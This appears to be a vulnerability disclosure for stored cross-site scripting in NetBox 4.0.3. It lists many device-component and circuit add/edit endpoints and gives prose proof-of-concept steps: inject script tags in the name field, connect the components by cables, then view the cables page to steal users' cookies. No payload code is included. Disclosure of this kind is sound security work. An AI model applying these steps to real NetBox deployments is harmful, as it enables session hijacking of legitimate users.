Description: Store XSS on the list api:

• /dcim/power-ports/add/
• /dcim/power-ports/{id}/edit/
• /dcim/console-server-ports/add/
• /dcim/console-server-ports/{id}/edit/
• /dcim/interfaces/add/
• /dcim/interfaces/{id}/edit/
• /dcim/rear-ports/{id}/edit/
• /dcim/rear-ports/add/
• /dcim/front-ports/{id}/edit/
• /dcim/front-ports/add/
• /dcim/power-outlets/{id}/edit/
• /dcim/power-outlets/add
• /dcim/console-ports/add
• /dcim/console-ports/{id}/edit/
• /dcim/power-feeds/add
• /dcim/power-feeds/{id}/edit/
• /circuits/circuits/{id}/edit/
• /circuits/circuits/add

of NetBox version 4.0.3 (https://github.com/netbox-community/netbox) allow remote attackers to hijack user's cookie via Parameter name except api (/Circuits/ Circuits/{id}/edit/) and (/Circuits/Circuits/add) then param is the circuit ID.

Proof of Concept:

1. Add or edit the above API list with malicious script tags at Param malicious.
2. Go to api connections > cables to connect malicious device components together.
3. After connecting successfully, when accessing api Connection > Cables again, the XSS Vulnerability immediately appeared. Impact:

Hijack user's cookies.